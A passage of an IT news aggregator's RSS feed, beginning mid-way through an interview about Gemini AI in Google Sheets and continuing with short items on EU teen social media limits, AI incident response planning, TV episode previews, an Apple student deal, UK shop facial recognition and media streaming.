<p>The addition of artificial intelligence can help handle that issue, he said, making the software more accessible to a wide range of office workers. “AI is unlocking the power of spreadsheets, taking on a lot of the difficult work that’s required to use them. That can be incredibly empowering for users,” said Birnbaum.</p>



<p>Google has steadily <a href="https://www.computerworld.com/article/4131504/gemini-supercharge-google-sheets-spreadsheets.html" data-type="link" data-id="https://www.computerworld.com/article/4131504/gemini-supercharge-google-sheets-spreadsheets.html">expanded generative AI (genAI) capabilities in Sheets</a> since launching Duet AI — now Gemini — for Workspace in 2023.</p>



<p>Gemini in Sheets is available at no extra cost to Google Workspace subscribers, though a paid <a href="https://knowledge.workspace.google.com/admin/generative-ai/workspace-with-gemini/ai-expanded-access" target="_blank" rel="noreferrer noopener">AI Expanded Access add-on </a>– costing $30 per user each month – is required to remove certain usage limits.</p>



<p>Features that have rolled out in recent months include the ability for a Gemini agent in Sheets to carry out <a href="https://workspaceupdates.googleblog.com/2025/10/expanded-editing-capabilities-gemini-in-google-sheets.html" target="_blank" rel="noreferrer noopener">multi-step actions</a> such as formatting, analysis and data entry, and, more recently, the ability to <a href="https://workspaceupdates.googleblog.com/2026/04/build-and-edit-complex-spreadsheets-with-Gemini-in-Google-Sheets.html" target="_blank" rel="noreferrer noopener">create entire spreadsheets</a> from a single prompt. A <a href="https://workspaceupdates.googleblog.com/2026/04/effortlessly-automate-data-entry-in-Google-Sheets-using-Fill-with-Gemini.html" target="_blank" rel="noreferrer noopener">Fill with Gemini feature </a>builds on the<a href="https://workspaceupdates.googleblog.com/2025/06/generate-data-with-gemini-in-google-sheets.html" target="_blank" rel="noreferrer noopener"> existing AI function,</a> enabling users to automatically populate selected cells by detecting intent from information within a spreadsheet as well as from the web.</p>



<p>Another feature, Sheets Canvas (currently available in alpha), lets users generate interactive apps that update in real-time based on changes to spreadsheet data. This could be a kanban board for a sales pipeline, for instance, or an analytics dashboard that uses Sheets as its back-end data source. </p>



<p>Google claims users already see a range of benefits from Gemini in Sheets. According to an August 2025 survey of 200 Sheets users conducted by the company, the majority of knowledge workers (89%) said AI features in Sheets save them at least an hour a week, and 88% believe AI features have made them more confident in their data analysis skills. </p>



<p>The most popular AI use cases include creating spreadsheets and charts, analyzing data, and fixing broken formulas. How widely these features are actually used is unclear; Google declined to provide weekly usage statistics for Gemini in Sheets.</p>



<p>As the company embeds Gemini deeper into Sheets, questions remain about just how much businesses can trust AI tools to handle important business data, as well as what increased automation means for those who spend much of their day wrangling data. </p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full is-resized"> width="480" height="480" sizes="auto, (max-width: 480px) 100vw, 480px"&gt;<figcaption class="wp-element-caption"><p>Eric Birnbaum, director of product management for Google Sheets.</p></figcaption></figure><p class="imageCredit">Google</p></div>



<p><em>Computerworld</em> recently talked with Birnbaum about the potential benefits and challenges of the latest evolution of spreadsheet software. This interview has been condensed and edited for clarity.</p>



<p><strong>As businesses become more focused on seeing value from AI investments, what measurable benefits are customers seeing from Gemini in Sheets – for example, time saved or other forms of return on investment? </strong>“Spreadsheets remain one of the universal languages for businesses, and we don’t anticipate that’s going to change anytime soon. But by bringing AI into the product where people work, we think it can significantly reduce the technical tax of data: the time spent understanding it, sourcing it, analyzing it, visualizing it.</p>



<p>“Historically, data professionals spent — let’s estimate it at 80% of their time — on the mechanical groundwork, data cleaning, crafting formulas, formatting, troubleshooting, and maybe only 20% of their time on actual strategic decision-making.</p>



<p>“We think that by offloading the manual, time-consuming, error-prone data work to Gemini, we can flip that ratio a bit, so humans can focus on the things that really matter: the high-value questions to ask and the judgment calls and decisions that get made from them. We’re starting to see evidence of that in our own user base and customer base.</p>



<p>“The second point to make is that AI can democratize data analysis to some extent, and make it available to many more users. For so many years, the spreadsheet was a gatekeeper; if you couldn’t speak the rigid language of spreadsheet formulas, you couldn’t extract the value from data. But by introducing these natural language interfaces, AI is separating the analytical capability from the technical literacy. </p>



<p>“If you can ask the right questions, or describe what you want in plain language, Gemini and Sheets can help you achieve your goals in a spreadsheet, even if you have minimal spreadsheet skills yourself.</p>



<p>“What we’ve seen so far from users and customers is that it’s incredibly empowering for people who might have been scared off by data analysis or dreaded opening spreadsheets in the past. You don’t need to go and wait for a data analyst to help you; you can go and do this work yourself in a spreadsheet.”</p>



<p><strong>The flip side is, how confident can businesses be if more junior employees can take on higher-level analysis tasks by relying on AI? Given the propensity for AI models to hallucinate, to what degree can businesses trust that these tools won’t introduce errors into important business data? </strong>“It’s something we spent a ton of time thinking about. We’ve gone to great lengths to build these AI tools to collaborate with you, to show their work, explain what they did, and make sure that you can take over where they leave off.</p>



<p>“Our Sheets agent, for example, lays out a really explicit, transparent plan for you to review and approve before any data manipulation happens. It’s designed to do that in plain natural language in a way that the average user could understand, and then it gives you back that final summary, so you know exactly what it did and where it did it.</p>



<p>“The other thing is that the model is great at explaining things. If you inherit a spreadsheet that has some complex formula that you don’t understand, for example, the model does an amazing job of explaining how it works and what it’s doing.</p>



<p>“In many ways AI is not only making these features more accessible, but helping users feel more confident in the output. Human error is an inherent risk in manual data management, with or without AI. One misplaced comma or broken cell reference can completely corrupt an entire financial model, and it can be completely undetected. </p>



<p>“Our approach with AI in Sheets is to create this deliberate verification loop. You now have another spreadsheet expert working along with you, reducing the likelihood of these mistakes.”</p>



<p><strong>Even if humans produce errors too, does it ultimately come down to accountability when AI is involved? </strong>“Our point of view here is that AI should be partnering with the knowledge worker who’s doing the work here. And everything that we’ve built is designed to be that partner. You might be able to offload tasks to the model, but we’re citing sources, we’re providing plans and explanations. We’re ultimately relying on the user to do that final verification.</p>



<p>“We spend a humongous amount of time focused on quality. We know that for AI to be useful in spreadsheets, it has to be reliable. When we launched Sheets Gemini Agent, for example, we were really proud that we set a state-of-the-art benchmark on the full SpreadsheetBench data set, which at the time exceeded competitors and near-human expert ability. </p>



<p>“But we know quality is never ‘good enough’ or done. We’re constantly working to improve quality for our users and customers, and for the use cases where they’re relying on AI most.”</p>



<p><strong>What potential do you see for more agentic functionality in Gemini Sheets — for example, bringing in data from other sources, creating recurring reports, or taking more actions independently? “</strong>We’re listening closely to customers and users and building what they’re telling us they need. The agent is already capable of doing very complex multistep workflows, and we see users discover that the agent is extremely capable of doing end-to-end spreadsheet tasks. In terms of connectors, in an alpha we have connections available to HubSpot, Salesforce, and Mailchimp. We hope to expand that over time.</p>



<p>“There’s no path to have AI replacing analysts. I think AI is giving analysts more time back to actually do the more valuable parts of their job. Analysts that I work with are way more productive and impactful than they ever were before, because they can push that uninteresting spreadsheet grunt work off to the model, freeing up time for more interesting and impactful work.</p>



<p>“A great example: the visualizations I’m getting back from analysts nowadays are canvases instead of static charts that I can explore myself. It’s way more informative and useful than what I was accustomed to before.”</p>



<p><strong>Looking ahead, do you expect a larger share of spreadsheet work to be carried out by agents, with humans setting goals and reviewing results? What will be the biggest change in how people use spreadsheets with AI? </strong>“The tasks are likely to stay similar and the use cases for spreadsheets are likely to continue to be relevant. The biggest change will be the ability to push the uninteresting spreadsheet grunt work off to a model and free up time for the user to do things that are more impactful, more interesting, more meaningful to the business.</p>



<p>‘Spreadsheets have historically been these like static containers where data goes to rest. I think AI can turn spreadsheets into these dynamic, localized software applications. And I do actually think this sort of changes the game for how people might use spreadsheets moving forward. </p>



<p>“It’s not just a passive grid full of numbers; spreadsheets are evolving to become these live, long-lived, collaborative applications. Employees can build these on the fly, like a basic CRM or supply chain dashboard in seconds. This is an area of investment for us moving forward, and we’re really excited to see how this evolves.”</p>



<p><strong>AI assistants and agents, such as ChatGPT or Claude, might be able to analyze spreadsheet files and business data without users working inside a spreadsheet application. What do you think will keep Sheets central to the workflow, rather than simply making it one part of a wider AI-driven process?</strong>“We’re in constant touch with customers and users; it’s clear work is still happening in spreadsheets. I think spreadsheets remain incredibly popular tools. If we can bring the AI capabilities users need directly into the product where they already are, we’ll transform the way they work.  </p>



<p>“I think we can be the front-end for some of this great AI innovation and the products that users are accustomed to today. Everything we build is guided by user feedback: users are telling us right now they want AI to help them do their everyday or more complex tasks, and they’re starting in Sheets today.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Social media limits are coming for teens across Europe]]></title>
<description><![CDATA[The European Union is weighing sweeping new restrictions on children's and teenagers' access to social media, including age limits, an outright ban, and phased access. Social media platforms could also be forced to prove their services are not harmful before young people are allowed to use them. ...]]></description>
<link>https://tsecurity.de/de/3664773/it-nachrichten/social-media-limits-are-coming-for-teens-across-europe/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664773/it-nachrichten/social-media-limits-are-coming-for-teens-across-europe/</guid>
<pubDate>Mon, 13 Jul 2026 11:32:26 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The European Union is weighing sweeping new restrictions on children's and teenagers' access to social media, including age limits, an outright ban, and phased access. Social media platforms could also be forced to prove their services are not harmful before young people are allowed to use them. European Commission President Ursula von der Leyen said […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Your AI risk register is not an incident response plan]]></title>
<description><![CDATA[Picture the moment after an AI issue is reported.



A security analyst is reviewing a ticket reporting that an internal AI tool produced the wrong recommendation in a live business workflow. The risk is not theoretical anymore. Someone wants to know whether this is a security incident, a model i...]]></description>
<link>https://tsecurity.de/de/3664715/it-security-nachrichten/your-ai-risk-register-is-not-an-incident-response-plan/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664715/it-security-nachrichten/your-ai-risk-register-is-not-an-incident-response-plan/</guid>
<pubDate>Mon, 13 Jul 2026 11:08:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Picture the moment after an AI issue is reported.</p>



<p>A security analyst is reviewing a ticket reporting that an internal AI tool produced the wrong recommendation in a live business workflow. The risk is not theoretical anymore. Someone wants to know whether this is a security incident, a model issue, a privacy issue, a vendor issue or just “something the AI did.” The risk register has a line item for inaccurate output, and it may even have a severity rating.</p>



<p>What it does not have is an answer to the question everyone is now asking: who has the authority to stop this thing?</p>



<p>That is the gap many <a href="https://www.nist.gov/itl/ai-risk-management-framework">AI governance programs</a> still need to close. Organizations are getting better at identifying AI risks, documenting them and assigning them to governance categories. What they are often less prepared for is the operational moment when an AI risk becomes a real event that has to be investigated, contained and explained.</p>



<p>In security programs, that distinction matters. A risk register can document concerns, but it cannot preserve evidence, notify leadership, assess impact or decide whether an AI system should keep running. Security leaders do not need another spreadsheet that says AI can fail; they need an executable response model for what happens when it does.</p>



<h2 class="wp-block-heading">The list is not the response</h2>



<p>Risk registers are useful because they create visibility. They help organizations name risks, compare severity, assign ownership and communicate concerns to leadership. In early AI adoption, visibility matters because many organizations are still discovering where AI is being used, what data is involved and which business processes may be affected.</p>



<p>But a risk register is not a control. Security teams already understand this in other domains. A list of vulnerabilities is not a vulnerability management program, and a list of third-party risks is not a vendor risk management function. The list is only the beginning of the work.</p>



<p>AI risk creates the same problem. A risk entry that says “model output may be inaccurate” does not define who monitors output quality, what level of error is acceptable, what evidence should be preserved or who can pause the system. A risk entry that says “sensitive data may be exposed” does not explain whether prompts are logged, whether outputs are reviewed, whether the vendor can use submitted data or whether the event should trigger privacy, legal or security escalation.</p>



<p>This is where AI governance can look stronger than it actually is. The organization may have a policy, a committee, an intake form and a risk register, but those artifacts do not automatically create operational readiness. When something happens, the real test is whether the organization knows what to do next.</p>



<h2 class="wp-block-heading">AI incidents do not always look like breaches</h2>



<p>Part of the challenge is that AI incidents do not always look like traditional cybersecurity incidents. A breach has familiar patterns: unauthorized access, data exfiltration, malware, credential compromise or suspicious activity in a system. AI failures can be messier because they may appear first as a bad recommendation, a misleading summary, an unsafe automation, a flawed classification or an output that quietly changes a decision.</p>



<p>That does not make them less important. An AI tool used in a security workflow could misclassify an alert. A <a href="https://owasp.org/www-project-top-10-for-large-language-model-applications/">generative AI assistant</a> could expose sensitive information in a response. A model embedded in a business process could drift over time and produce unreliable recommendations. A vendor-managed AI feature could change behavior after an update that the organization did not fully review.</p>



<p>Security teams need a practical way to sort these events. Not every AI error should be treated as a full security incident. Still, every organization using AI in meaningful workflows should know how AI-related events are reported, triaged and escalated. Without that structure, teams may lose time debating ownership while the impact continues.</p>



<p>The first step is defining <a href="https://www.oecd.org/en/publications/towards-a-common-reporting-framework-for-ai-incidents_f326d4ac-en.html">what counts as an AI incident</a>. That definition should be broad enough to capture security, privacy, safety, operational and compliance concerns, but specific enough that employees know when to report something. A confusing chatbot answer may not require the same response as a data exposure event, but both should have a path for review.</p>



<h2 class="wp-block-heading">Evidence has to exist before the investigation</h2>



<p>Incident response depends on evidence. That is obvious in cybersecurity, but it is often overlooked in AI governance conversations. If an organization cannot reconstruct what happened, who used the system, what data was involved and what output was produced, it will struggle to investigate the event or defend its response.</p>



<p>AI systems can complicate that evidence trail. Prompts may not be logged. Outputs may not be retained. Vendor tools may provide limited visibility. Model versions may change. Users may copy AI-generated content into other systems without preserving its source. Business teams may treat AI output as a recommendation rather than a system event.</p>



<p>Security leaders should push for evidence requirements before AI systems move into production. At a minimum, organizations should know what logs are available, how long they are retained, who can access them and whether they are sufficient for investigation. For higher-risk use cases, teams may also need records of model version, prompt history, output history, user actions, data sources and downstream decisions.</p>



<p>This does not mean every AI interaction needs heavy surveillance. Monitoring should be proportional to risk, and organizations still need to respect privacy, legal and workforce considerations. The point is simpler: if the AI system matters enough to influence real work, it matters enough to leave an evidence trail when something goes wrong.</p>



<h2 class="wp-block-heading">Ownership cannot be implied</h2>



<p>AI ownership is often fragmented. A business unit may sponsor the use case, a data science team may configure the model, IT may manage the platform, security may assess risk, and a vendor may provide the underlying capability. Everyone is involved, but no one may be fully accountable after deployment.</p>



<p>That ambiguity becomes dangerous during an incident. If an AI tool begins producing unreliable output, the organization needs to know who owns the system, who owns the business process and who owns the decision to continue or stop use. A governance committee can provide oversight, but it usually cannot serve as the operational owner of every deployed AI capability.</p>



<p>Security programs should insist on named ownership for AI systems, especially those used in sensitive or high-impact workflows. Ownership should include responsibility for monitoring, exceptions, user guidance, vendor coordination and incident escalation. It should also include decision rights, because accountability without authority is just a name in a spreadsheet.</p>



<p>The hardest question is often pause authority. Who can suspend, restrict, roll back or retire an AI system when risk exceeds tolerance? If that question is not answered before deployment, the organization may be forced to answer it under pressure.</p>



<h2 class="wp-block-heading">Security leaders need an AI response playbook</h2>



<p>An AI response playbook does not need to be complicated, but it does need to be real. It should explain how employees report AI concerns, how the event is triaged, what evidence is preserved, who investigates, when legal or privacy teams are involved, and who can make operational decisions. It should also define when executive leadership needs to be notified.</p>



<p>The playbook should reflect the type of AI system involved. A low-risk internal productivity tool may require a lightweight review path. An AI system supporting security operations, regulated decisions, customer communication, healthcare workflows or financial processes needs stronger monitoring and escalation. The response model should fit the risk of the use case.</p>



<p>This is where security can add discipline without turning AI governance into bureaucracy. Security teams already know how to build escalation paths, preserve evidence, run incident reviews and improve controls after failures. The opportunity is to extend that operating muscle into AI governance before incidents force the issue.</p>



<p>Organizations should also conduct post-incident reviews for meaningful AI events. The goal should not be blame; it should be learning. Did the monitoring work? Was the owner clear? Was the evidence sufficient? Did the vendor respond? Were users confused about acceptable use? Did the organization know who could make the decision?</p>



<h2 class="wp-block-heading">Governance has to be executable</h2>



<p>AI governance is often discussed as a policy, ethics or compliance challenge. It is all of those things, but once AI systems enter production, it also becomes a security execution challenge. Risk has to be monitored, events have to be investigated and someone has to be able to act.</p>



<p>That is why the next maturity step is not simply better documentation. Organizations need governance that works when a system is live, a decision is time-sensitive and the facts are incomplete. In that moment, the risk register may help explain what the organization expected, but it will not run the response.</p>



<p>Security leaders should not wait for AI governance to arrive fully formed from somewhere else in the enterprise. They should help shape the operating model now, while many organizations are still early enough to correct course. The goal is not to own every AI risk; it is to ensure AI risk can be managed once AI becomes operational.</p>



<p>A risk register can tell leaders what might go wrong. An incident response plan tells people what to do when it does. For AI governance to matter in security programs, organizations need both.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[‘House of the Dragon’ Season 3, Episode 5 Release Date and What to Expect]]></title>
<description><![CDATA[House of the Dragon Season 3, Episode 5 will arrive on Sunday, July 19, 2026, continuing the increasingly violent conflict between Rhaenyra Targaryen and the forces supporting Aegon II. Viewers in India can stream the episode early on Monday, July 20.



Episode 5 Release Details




US release d...]]></description>
<link>https://tsecurity.de/de/3664631/ios-mac-os/house-of-the-dragon-season-3-episode-5-release-date-and-what-to-expect/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664631/ios-mac-os/house-of-the-dragon-season-3-episode-5-release-date-and-what-to-expect/</guid>
<pubDate>Mon, 13 Jul 2026 10:25:03 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[House of the Dragon Season 3, Episode 5 will arrive on Sunday, July 19, 2026, continuing the increasingly violent conflict between Rhaenyra Targaryen and the forces supporting Aegon II. Viewers in India can stream the episode early on Monday, July 20.



Episode 5 Release Details




US release date: Sunday, July 19, 2026



US release time: 9 p.m. ET and 6 p.m. PT



India release date: Monday, July 20, 2026



India release time: Around 6:30 a.m. IST



Where to watch: HBO and HBO Max in supported regions



Genre: Fantasy, drama and action



Episode: Season 3, Episode 5



Runtime: HBO has not confirmed the official duration



Main cast: Emma D’Arcy, Matt Smith, Olivia Cooke, Ewan Mitchell, Tom Glynn-Carney, Sonoya Mizuno, Phoebe Campbell and James Norton




Season 3 contains eight episodes, with a new episode releasing every Sunday in the United States. The finale is currently scheduled for August 9, 2026.



Where Is the Story Heading?



Spoilers for House of the Dragon Season 3, Episode 4 ahead.



Episode 5 will continue the fallout from Daeron Targaryen’s disturbing transformation under Ormund Hightower. Ormund forced the young prince into committing his first murder, using Tessarion to kill Leo after a confrontation involving Hightower soldiers. The event showed how Ormund intends to shape Daeron into a weapon for the Greens.



Daeron now faces a growing conflict between his Targaryen identity and the Hightower family that raised him. His connection with Tessarion also makes him an important player in the war, especially as both sides prepare for larger battles around Tumbleton.



Daemon’s Secret Could Create More Trouble



Episode 4 also revealed that Daemon lied to Rhaenyra about killing Sheepstealer’s rider. The rider is his daughter Rhaena, who refused to abandon the wild dragon. Daemon instead killed a shepherd and presented the remains to Rhaenyra as proof that he had completed her order.



Episode 5 could place Daemon under greater pressure as Mysaria already suspects that he is hiding something. Rhaena’s bond with Sheepstealer also gives the Blacks another possible dragonrider, although her decision to claim the dragon could deepen the conflict within Rhaenyra’s court.



Meanwhile, Rhaenyra must handle political betrayal, financial problems and growing doubts about her leadership. With Daeron entering the war and Daemon keeping dangerous secrets, Episode 5 should move several major characters closer to direct confrontation.



What do you plan to watch when House of the Dragon Season 3, Episode 5 arrives? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Silo Season 3 Episode 2 Explains Why Memory Is the Show’s Deadliest Weapon]]></title>
<description><![CDATA[Silo Season 3 is using its flashbacks to reveal how memory became one of the most powerful weapons behind the creation and control of the silos.



Episode 2, “It’s All Good,” continues the season’s split-timeline structure, moving between Juliette Nichols in Silo 18 and events from more than 350...]]></description>
<link>https://tsecurity.de/de/3664576/ios-mac-os/silo-season-3-episode-2-explains-why-memory-is-the-shows-deadliest-weapon/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664576/ios-mac-os/silo-season-3-episode-2-explains-why-memory-is-the-shows-deadliest-weapon/</guid>
<pubDate>Mon, 13 Jul 2026 09:54:10 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Silo Season 3 is using its flashbacks to reveal how memory became one of the most powerful weapons behind the creation and control of the silos.



Episode 2, “It’s All Good,” continues the season’s split-timeline structure, moving between Juliette Nichols in Silo 18 and events from more than 350 years earlier. The season has turned its origin story into a political conspiracy involving Daniel Keene, Helen Drew, Charlotte Keene, and a government determined to hide the truth.



Charlotte and Juliette Are Living the Same Nightmare



Charlotte’s treatment introduces Dr. Victor Crnkovich, a specialist who claims he can remove painful memories and replace them with safer ones. His methods were reportedly tested on prisoners before being used to treat traumatised military personnel.



However, Charlotte’s condition suggests that the treatment has become a tool for controlling what people know. Someone has removed important parts of her past, especially her knowledge of the conflict involving Iran and the suspected dirty bomb attack.



Juliette faces a similar situation inside Silo 18. Camille and the Algorithm are using memory-altering drugs, edited recordings, and false accounts to convince her that the reality she remembers never happened. Her knowledge of Silo 17 and the outside world threatens the system that keeps the population obedient.



By placing these stories beside each other, Season 3 shows that the methods used inside the silo began long before the apocalypse. Charlotte and Juliette live centuries apart, but both women are trapped inside systems that rewrite their identities.



The Flashbacks Explain the Silo’s Resets



The Algorithm tells Camille that six population resets have already taken place, including one in Silo 18 around 140 years earlier. These resets likely involved more than stopping rebellions or replacing leaders.



They may have included drugging the water supply and erasing shared memories across the population. Crnkovich’s work provides a possible origin for the substances now being used against Juliette.



The drugs can remove older memories, but they cannot fully control how someone responds to new evidence. Juliette is already questioning the official story because parts of her memory continue to return. Charlotte may also recover enough information to expose what happened before the silos were activated.



Why the Pez Dispenser Matters



The duck Pez dispenser first appeared to be a simple object that survived from the old world. Season 3 now suggests that it carries a much deeper meaning. The premiere connected the same dispenser seen in the past to the relic later found inside Silo 18.



Physical objects can act as memory triggers. If Helen or Charlotte carried the dispenser into the silo, it may have helped someone preserve memories that the drugs were meant to erase.



This also explains why the authorities treat relics as dangerous objects. Relics provide evidence that the official version of history is incomplete. Some may even restore memories and reconnect people with truths hidden during previous resets.



The Flashbacks Could Reveal Who Created the Apocalypse



Helen’s investigation raises the possibility that the dirty bomb attack blamed on Iran was staged to justify a larger military response. If true, the disaster that forced humanity underground may have been planned rather than accidental.



The flashbacks are slowly showing how political manipulation, memory experiments, and the silo project became connected. Juliette’s story reveals the result of that plan, while Charlotte’s timeline shows how it started.



Season 3 still has several mysteries to solve, including the possible role of nanotechnology. However, the pattern is becoming clearer. The silos survive by controlling memory, destroying evidence, and removing anyone who remembers too much.]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Prepares To Launch Its Student Back To School Deal This Week]]></title>
<description><![CDATA[Every year, students look forward to special offers when buying new gear for their classes. These annual promotions usually happen a bit earlier in the summer, but recent price jumps caused a delay. Now, reports say Apple is finally getting ready to bring back its popular student promotion. This ...]]></description>
<link>https://tsecurity.de/de/3663623/ios-mac-os/apple-prepares-to-launch-its-student-back-to-school-deal-this-week/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3663623/ios-mac-os/apple-prepares-to-launch-its-student-back-to-school-deal-this-week/</guid>
<pubDate>Sun, 12 Jul 2026 18:54:23 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Every year, students look forward to special offers when buying new gear for their classes. These annual promotions usually happen a bit earlier in the summer, but recent price jumps caused a delay. Now, reports say Apple is finally getting ready to bring back its popular student promotion. This means eligible buyers could soon see some nice perks when picking up a new device for the classroom.



Retail stores prepare to showcase new student deals and tables



According to Mark Gurman at Bloomberg, the tech brand is setting up fresh promotional materials in its retail locations by the middle of this week. Staff members will reorganize the floors to include a special education table. This display will likely highlight different models of the Mac alongside other popular products.




https://twitter.com/markgurman/status/2076297126309421331




Usually, the company gives away free accessories like AirPods or a gift card worth over a hundred dollars when someone buys a MacBook or similar hardware for school. A recent memory shortage forced the brand to raise prices on its devices. Because of these higher costs, the upcoming perks might need to be a bit better to catch a buyer's attention.



Shoppers should also know about a recent change to the online education store in the United States. The platform recently added UNiDAYS verification. This means you must clearly prove you are an active student before you can grab a new iPad at a discount. We will soon see what rewards the brand decides to offer students heading back to campus.]]></content:encoded>
</item>
<item>
<title><![CDATA[Facial Recognition in UK Shops Will Soon Instantly Alert Police About Offenders]]></title>
<description><![CDATA[Facial recognition technology in U.K. shops "will soon alert police in real time to the presence of serious offenders," reports The Guardian, "with civil liberties groups warning of a 'dangerous escalation' towards surveillance and criminalisation in the retail sector."

Facewatch, a facial recog...]]></description>
<link>https://tsecurity.de/de/3662955/it-security-nachrichten/facial-recognition-in-uk-shops-will-soon-instantly-alert-police-about-offenders/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662955/it-security-nachrichten/facial-recognition-in-uk-shops-will-soon-instantly-alert-police-about-offenders/</guid>
<pubDate>Sun, 12 Jul 2026 10:07:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Facial recognition technology in U.K. shops "will soon alert police in real time to the presence of serious offenders," reports The Guardian, "with civil liberties groups warning of a 'dangerous escalation' towards surveillance and criminalisation in the retail sector."

Facewatch, a facial recognition system used by more than 100 businesses including Sainsbury's, B&amp;M and Spar to monitor thieves, said it was launching a UK-first feature to "alert police instantly when the most serious offenders trigger a live facial recognition match". Facewatch's chief executive, Nick Fisher, said the "unique technical development" would be launched in autumn and would warn police in an average of four seconds when the "worst offenders" were flagged on its network... Charlie Whelton, the policy and campaigns officer at [civil liberties nonprofit] Liberty, said it was concerned about this "untested, opaque development" and the way facial recognition technology had been allowed to "proliferate without anything to govern it". 
"It's not against the law to walk into a shop even if you've committed crimes in the past," he said. "The idea of calling the police on somebody who hasn't committed a crime, but there's a concern they might, is really upending the way we do things. And of course, it's not infallible. These systems do make mistakes, and it's very hard to argue with that when it happens to you." A number of people have been forced to leave shops after being falsely identified by Facewatch technology as a shoplifter, with some describing it as "Orwellian" and saying they felt as though they were "guilty until proven innocent"... 

The use of the Facewatch technology looks set to quickly expand, with Sainsbury's recently announcing plans to increase its use from 55 stores to more than 200 by the end of the year. Facewatch said it alerted retailers almost 300,000 times that a "known repeat offender" had entered a store during the first six months of 2026, and that its system allowed staff to intervene "before theft, abuse or violence could occur or escalate"... [E]xperts argue the use of facial recognition technology in shops to catch shoplifters is disproportionate. Nuala Polo, the UK public policy lead at the Ada Lovelace Institute, which studies the impact of AI on society, said: "There are other, much less intrusive means that you can use to catch shoplifters where you don't need to be scanning millions of faces every day, virtually without consent...." 

The campaign group Big Brother Watch has criticised police for "inserting themselves into this cowboy operation" and said people would be matched against "a secret blacklist compiled by unaccountable businesses and private security guards".<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Facial+Recognition+in+UK+Shops+Will+Soon+Instantly+Alert+Police+About+Offenders%3A+https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F07%2F12%2F0259226%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fnews.slashdot.org%2Fstory%2F26%2F07%2F12%2F0259226%2Ffacial-recognition-in-uk-shops-will-soon-instantly-alert-police-about-offenders%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://news.slashdot.org/story/26/07/12/0259226/facial-recognition-in-uk-shops-will-soon-instantly-alert-police-about-offenders?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Helping media companies navigate the new streaming normal]]></title>
<description><![CDATA[Editor’s note: An earlier version of this feature originally appeared on Next TV and TV Technology.From the explosion of new programming to the launch of high-profile streaming services, 2020 was on track to be a transformational year in media and entertainment. But at the same time, the industry...]]></description>
<link>https://tsecurity.de/de/3662852/it-security-nachrichten/helping-media-companies-navigate-the-new-streaming-normal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662852/it-security-nachrichten/helping-media-companies-navigate-the-new-streaming-normal/</guid>
<pubDate>Sun, 12 Jul 2026 08:07:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph"><p><i><b>Editor’s note</b>: An earlier version of this feature originally appeared on <a href="https://www.nexttv.com/blogs/googles-anil-jain-how-media-companies-can-navigate-the-new-norm-with-cloud-technology" target="_blank">Next TV </a>and <a href="https://www.tvtechnology.com/opinion/googles-anil-jain-how-media-companies-can-navigate-the-new-norm-with-cloud-technology" target="_blank">TV Technology</a>.</i></p><p>From the explosion of new programming to the launch of high-profile streaming services, 2020 was on track to be a transformational year in media and entertainment. But at the same time, the industry fully expected many of its foundational elements—windowing strategies, live events, production standards—to stay the same.</p><p>All that changed with COVID-19. Suddenly, the future came early to the industry, with many facing difficult challenges like accelerating and evolving direct-to-consumer business models while at the same time keeping workers and productions physically distanced.</p><p>As media companies transition from short-term response to long-term planning, many are contemplating how different the industry might look in the months and years to come.</p><p>All this is the topic of our new guide,<a href="https://inthecloud.withgoogle.com/media-transformation-during-covid/dl-cd.html?utm_source=google&amp;utm_medium=email&amp;utm_campaign=-&amp;utm_content=mediapageevolution" target="_blank"> Accelerated Media Evolution In The Time Of COVID</a>, and the focus of our<a href="https://inthecloud.withgoogle.com/media-transformation-during-covid/dl-cd.html?utm_source=google&amp;utm_medium=email&amp;utm_campaign=-&amp;utm_content=mediapageevolution" target="_blank"> Media OnAir</a> events, where we’ll share insights from our work with leading media companies. For these organizations and others, we recommend keeping new audience behaviors top of mind and focusing on driving three key changes.</p><p><b>1. Scale new monetization channels and engage audiences through data </b></p><p></p><p>As audiences were stuck at home during the early stages of the pandemic, linear viewing saw a 